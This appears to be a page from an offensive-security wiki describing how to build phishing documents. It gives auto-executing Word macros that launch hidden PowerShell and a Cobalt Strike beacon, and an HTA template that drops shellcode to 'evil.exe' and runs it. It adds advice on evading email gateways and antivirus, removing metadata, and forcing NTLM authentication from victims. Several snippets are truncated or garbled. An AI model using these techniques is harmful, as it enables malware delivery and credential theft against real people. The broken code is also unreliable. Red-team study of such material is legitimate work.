Phishing Files & Documents

Office Documents

Microsoft Word performs file data validation before opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
Usually, Word files containing macros use the .docm extension. However, it's possible to rename the file by changing the file extension and still keep their macro executing capabilities. For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution. The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
You can use the following command to check which extensions are going to be executed by some Office programs:
assoc | findstr /i "word excel powerp"
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.

External Image Load

Go to: Insert --> Quick Parts --> Field Categories: Links and References, Filed names: includePicture, and Filename or URL: http://<ip>/whatever

Macros Backdoor

It's possible to use macros to run arbitrary code from the document.

Autoload functions

The more common they are, the more probable the AV will detect them.
  • AutoOpen()
  • Document_Open()

Macros Code Examples

Sub AutoOpen()
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Manually remove metadata

Fo to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information.

Doc Extension

When finished, select Save as type dropdown, change the format from .docx to Word 97-2003 .doc. Do this because you can't save macro's inside a .docx and there's a stigma around the macro-enabled .docm extension (e.g. the thumbnail icon has a huge ! and some web/email gateway block them entirely). Therefore, this legacy .doc extension is the best compromise.

Malicious Macros Generators

HTA Files

An HTA is a proprietary Windows program whose source code consists of HTML and one or more scripting languages supported by Internet Explorer (VBScript and JScript). HTML is used to generate the user interface and the scripting language for the program logic. An HTA executes without the constraints of the browser's security model, so it executes as a "fully trusted" application.
An HTA is executed using mshta.exe, which is typically installed along with Internet Explorer, making mshta dependant on IE. So if it has been uninstalled, HTAs will be unable to execute.
<--! Basic HTA Execution -->
<title>Hello World</title>
<h2>Hello World</h2>
<p>This is an HTA...</p>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell") "calc"
End Function
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell") var_tempexe, 0, true
End Function

Forcing NTLM Authentication

There are several ways to force NTLM authentication "remotely", for example, you could add invisible images to emails or HTML that the user will access (even HTTP MitM?). Or send the victim the address of files that will trigger an authentication just for opening the folder.
Check these ideas and more in the following pages:

NTLM Relay

Don't forget that you cannot only steal the hash or the authentication but also perform NTLM relay attacks: